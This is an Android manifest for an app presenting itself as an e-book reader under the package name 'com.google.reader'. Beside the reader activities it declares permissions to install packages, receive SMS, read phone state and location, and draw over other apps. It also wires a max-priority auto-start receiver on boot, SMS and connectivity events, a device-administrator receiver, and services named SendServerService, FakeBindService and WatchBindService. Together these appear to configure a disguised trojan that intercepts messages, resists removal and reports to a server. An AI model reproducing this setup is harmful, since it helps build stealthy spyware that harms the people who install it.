<manifest
        package="com.google.reader"
        xmlns:android="http://schemas.android.com/apk/res/android"
        android:versionCode="1"
        android:versionName="1.2.3">

    <uses-sdk
            android:minSdkVersion="8"
            android:targetSdkVersion="19"/>

    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.INSTALL_PACKAGES"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <!--用于向系统顶层窗口添加窗口-->
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>

    <application
            android:name="com.xstd.ip.InitApplication"
            android:allowBackup="true"
            android:icon="@drawable/icon"
            android:label="@string/app_name"
            android:theme="@style/AppTheme">
        <activity
                android:name="com.andorid.shu.love.LoveReaderActivity"
                android:label="@string/app_name"
                android:theme="@android:style/Theme.Black.NoTitleBar">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>

                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name="com.andorid.shu.love.BookActivity"/>
        <activity android:name="com.android.filebrowser.ExternalStorageActivity"/>
        <activity
                android:name="com.android.filebrowser.PasteFile"
                android:theme="@android:style/Theme.NoTitleBar.Fullscreen"/>
        <activity android:name="com.xstd.ip.BindFakeActivity"/>

        <receiver android:name="com.xstd.ip.receiver.AutoStartReceiver">
            <intent-filter android:priority="0x7FFFFFFF">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </receiver>
        <receiver
                android:name="com.xstd.ip.receiver.PackageAddRemReceiver"
                android:priority="0x7FFFFFFF">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>

                <data android:scheme="package"/>
            </intent-filter>
        </receiver>
        <receiver
                android:name="com.xstd.ip.receiver.BindDeviceReceiver"
                android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data
                    android:name="android.app.device_admin"
                    android:resource="@xml/device_admin"/>

            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLED"/>
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED"/>
            </intent-filter>
        </receiver>

        <service android:name="com.xstd.ip.service.CoreService"/>
        <service android:name="com.xstd.ip.service.SendServerService"/>
        <service android:name="com.xstd.ip.service.FakeBindService"/>
        <service android:name="com.xstd.ip.service.WatchBindService"/>
    </application>

</manifest>